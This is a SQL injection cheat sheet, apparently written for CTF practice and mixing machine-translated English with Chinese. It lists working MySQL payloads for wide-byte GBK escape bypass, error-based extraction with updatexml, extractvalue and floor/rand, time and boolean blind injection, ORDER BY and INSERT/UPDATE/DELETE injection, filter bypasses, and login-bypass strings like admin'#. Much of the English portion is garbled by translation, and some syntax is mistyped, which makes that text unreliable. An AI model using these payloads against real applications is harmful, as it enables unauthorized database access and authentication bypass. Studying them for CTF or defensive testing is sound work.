table of Contents
A wide byte injection
Principle: GBK encoding, URL transcoding
by using a characteristic of mysql, mysql when using GBK encoding, two characters are considered to be a character (ASCII code is greater than the previous 128, to a range of characters only)
, for example: '-> '->% 5C% 27
% DF' ->% DF '-> DF% 5C% 27%- SQL injection common URL-encoded
characters | URL encoding
: -: |: -:
Space |% 20
'| 27%
# | 23%
|%. 5C - php-addslashes function: with a backslash before the special character \ to escape
- How to escape from the addslashes function?
\
Plus a front\
, become\\'
so \ will be escaped- The \ did not get
Or column name table may be used to implement transcoding hexadecimal
example: ctf -> 0x637466
added parameter sqlmap--hex
Second, the constraint-based injection
- Principle: length exceeds the data type can not be inserted into the table portion, if not the only field as the field can be inserted duplicate data
- For example: many registered admin + space + 1, successfully logged in as admin
Third, the error injection
official
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2)x from information_schema.tables group by x)a)); or updatexml(1,concat(0x7e,(version())),0)//最大长度是32位 and extractvalue(1,concat(0x7e,(select database()))) and exp(~(select * from (select user())a));
Fourth, the time blinds
Principle: the ability to intercept the string, while the trigger delay can be
SELECT * FROM table WHERE id = 1 AND (if(SUBSTR(database(),1,1)=' ',sleep(5),null))
SELECT * FROM table WHERE id = 1 AND (if(acsii(substr(database(),1,1))=100,sleep(5),null))
related functions
- Delay Method
SLEEP(duration)
BENCHMARK (count, expr)
egselect benchmark(10000000,sha(1))
笛卡尔积
例如SELECT count(*) FROM information_schema.columns A,information_schema.columns B, information_schema.tables C;
ps:COUNT(*)计算行数GET_LOCK(str,timeout)
需要开启两个会话才能生效
RLIKE
通过rpad或repeat构造长字符串,加以计算量大的pattern,通过repeat的参数可以控制延时长短
例如select concat(rpad(1,9999999,'a'),rpad(1,9999999,'a'),···,rpad(1,9999999,'a')) RLIKE '(a.*)+(a.*)+···+(a.*)+b
- 条件
IF(expr1,expr2,expr3)
CASE WHEN [condition] when [result]
- 字符串截取
SUBSTR(SUBSTRING)
substr同substring,有多种参数选择
SUBSTRING(str,pos)
,SUBSTRING(str FROM pos)
,SUBSTRING(str,pos,len)
,SUBSTRING(str FROM pos FOR len)
MID(str,pos,len)同SUBSTRING(str,pos,len)
SUBSTRING_INDEX(str,delim,count)
LEFT(str,len)
- 字符串转换
- ASCII()
- ORD()
- CHR()
- Delay Method
五、bool盲注
- 原理:利用回显的消息不同,判断输入表达式是否正确
- 常用函数
基本同时间盲注
六、order by的注入
使用ORDER BY子句对查询结果按一列或多列排序。
ORDER BY子句的语法格式为:
ORDER BY {column_name [ASC|DESC]}[,...n]
- ORDER BY语句默认按照升序对记录进行排序
- 在不知道列名的情况下可以通过列的序号来指代相应的列。但是这里无法做运算
- 当ORDER BY注入能通过返回错误信息是,也可以考虑使用报错注入
- 根据不同的列排序,会返回不同的结果,也可以使用类似于bool型盲注的形式来注入
- ORDER BY后面字段可以通过位运算符(|&^~)来使代码被执行,例如
select * from xxx order by id|(sleep(5))
- ORDER BY在括号中时后面可以跟UNION,例如
(select 1,2,3 order by 3 asc)union(select 2,3,4)
六、INSERT、UPDATE、DELETE相关的注入
INSERT
例如:
insert into users (id,username,password) values (2,'attacker' or updatexml(1,concat(0x7e,database()),0), 'password')
UPDATE
例如:
update users set password='password' or updatexml(1,concat(0x7e,database()),0) where id=2
delete
例如:
delete from users where id=2 or updatexml(1,concat(0x7e,database()),0)
七、常用绕过
- 空格
- /**/
- =
- like
- regexp
- !(<>)
- '
- 转义符
\
- 16进制(例如:ctf -> 0x637466)
- 转义符
八、万能密码
select * from admin where username = '' and password = ''
username | password |
---|---|
admin'# | |
'+' | '+' |
aaa'=' | aaa'=' |